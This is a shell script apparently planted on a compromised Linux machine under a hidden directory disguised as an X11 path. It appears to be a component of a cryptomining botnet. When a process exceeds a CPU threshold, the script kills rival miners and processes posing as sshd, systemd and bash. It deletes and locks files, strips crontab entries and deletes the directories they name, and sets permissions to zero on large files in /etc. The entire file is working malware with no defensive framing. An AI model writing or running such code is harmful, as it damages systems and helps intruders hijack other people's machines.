File: //usr/tmp/.X281-unix/.rsync/a/init02
#!/bin/sh
CPU_THRESHOLD=20
# Space-separated list of excluded process names
EXCLUSIONS="kswapd0 kauditd0 edac0 kthreadadd python"
execute() {
pkill -9 sendmail
pkill -f /etc/
pkill -f /tmp
rm -rf /usr/bin/bsd-port/
pkill -f /usr/bin/bsd-port
find /etc -maxdepth 1 -type f -size +1M -exec chmod 0 {} \;
rm -rf /lib/systemd/system/kswpad
rm -rf /lib/systemd/system/conf.n
rm -rf /etc/kswpad; touch /etc/kswpad; chmod 0 /etc/kswpad;
rm -rf /etc/conf.n; touch /etc/conf.n; chmod 0 /etc/conf.n;
rm -rf /usr/bin/.sshd; touch /usr/bin/.sshd; chmod 0 /usr/bin/.sshd
pkill -9 kworkel && pkill -9 kswpad && pkill -9 kw0rker
rm -rf /usr/lib/systemd/system/systemd; touch /usr/lib/systemd/system/systemd; chmod 0 /usr/lib/systemd/system/systemd;
ps -e -o pid= -o comm= | while read pid comm; do [ "$comm" = "systemd" ] && [ "$pid" -gt 3000 ] && kill "$pid"; done
ps -e -o pid= -o args= | while read pid args; do case "$args" in /usr/bin/.sshd*) kill "$pid" ;; esac; done
ps -e -o pid= -o comm= | while read pid comm; do [ "$comm" = "/usr/bin" ] && [ "$pid" -gt 3000 ] && kill "$pid"; done
ss -p state established '( dport = :http or sport = :http )' | awk '/linux/ {split($6, parts, ","); print substr(parts[2], 4)}' | sed 's/=/ /g'| xargs kill -9
rm -rf /tmp/linux; touch /tmp/linux; chmod 0 /tmp/linux;
pkill -f /tmp/linux
pkill -f /usr/bin/dpkgd/*
cp /usr/bin/dpkgd/* /usr/bin/
rm -rf /lib/systemd/system/conf.n; touch /lib/systemd/system/conf.n; chmod 0 /lib/systemd/system/conf.n;
pkill -9 kswpa
ps auxf|grep -v grep|grep "kw0rker" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "llda" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "dpkgd" | awk '{print $2}'|xargs kill -9
ps -eo pid=,ppid=,comm=,%cpu= | awk '$3=="-bash" && $4>10 {print $1" "$2}' | while read pid ppid; do kill -9 "$pid" "$ppid"; done
rm -rf /tmp/.bash; touch /tmp/.bash; chmod 0 /tmp/.bash;
rm -rf /tmp/.snap-private-bash; touch /tmp/.snap-private-bash; chmod 0 /tmp/.snap-private-bash;
rm -rf /bin/-bash; touch /bin/-bash; chmod 0 /bin/-bash;
ss -p state established '( dport = :http or sport = :http )' | awk '/bash/ {split($6, parts, ","); print substr(parts[2], 4)}' | sed 's/=/ /g'| xargs kill -9
ss -p state established '\( dport = :http or sport = :http \)' | awk '/bash/ {split\($6, parts, ","\); print substr(parts[2], 4)}' | sed 's/=/ /g'| xargs kill -9
crontab -l | grep -E 'bash|auth' | awk '{for(i=1;i<=NF;i++){if($i=="cd"){print $(i+1)}}}' | xargs -r rm -rf && crontab -l | grep -vE 'bash|auth' | crontab -
ps -eo pid,ppid,comm,%cpu | awk '$3 ~ /(bash|sshd|system)/ && $4>5 {print $1" "$2}' | while read pid ppid; do kill -9 "$pid" "$ppid"; done
ps -eo pid,ppid,comm,%cpu | awk '$3=="-bash" && $4>5 {print $1" "$2}' | while read pid ppid; do kill -9 "$pid" "$ppid"; done
ps -eo pid=,pcpu=,comm= | awk 'NR>1 && $3 ~ /bash/ && $2 > 5 {print $1}' | xargs kill
ps -eo pid,ppid,comm,%cpu | grep "system" | awk '$2>1000 {print $1" "$2}' | while read pid ppid; do kill -9 "$pid" "$ppid"; done
kill $(ps -eo pid,ppid,comm,%cpu | grep "[a-zA-Z0-9]\{10\}" | awk '$4>5 {print $2}' | xargs -I {} bash -c 'echo {}; pids=$(pgrep -P {}); while [ ! -z "$pids" ]; do echo $pids;
pids=$(pgrep -P $(echo $pids)); done' | tr '\n' ' ' | xargs kill -9)
}
handle_high_cpu() {
pid=$1
cpu=$2
cmd=$3
echo "High CPU process detected:"
echo "PID: $pid | CPU: $cpu% | CMD: $cmd"
# Example actions
renice 10 -p "$pid" >/dev/null 2>&1
logger "High CPU detected: PID=$pid CPU=$cpu CMD=$cmd"
# optional
execute
}
is_excluded() {
cmd=$1
for ex in $EXCLUSIONS; do
if [ "$cmd" = "$ex" ]; then
return 0
fi
done
return 1
}
ps -eo pid,pcpu,comm | awk 'NR>1' | while read pid cpu cmd
do
# extract integer part of CPU value
cpu_int=`echo "$cpu" | cut -d. -f1`
if [ "$cpu_int" -gt "$CPU_THRESHOLD" ]; then
if is_excluded "$cmd"; then
continue
fi
handle_high_cpu "$pid" "$cpu" "$cmd"
fi
done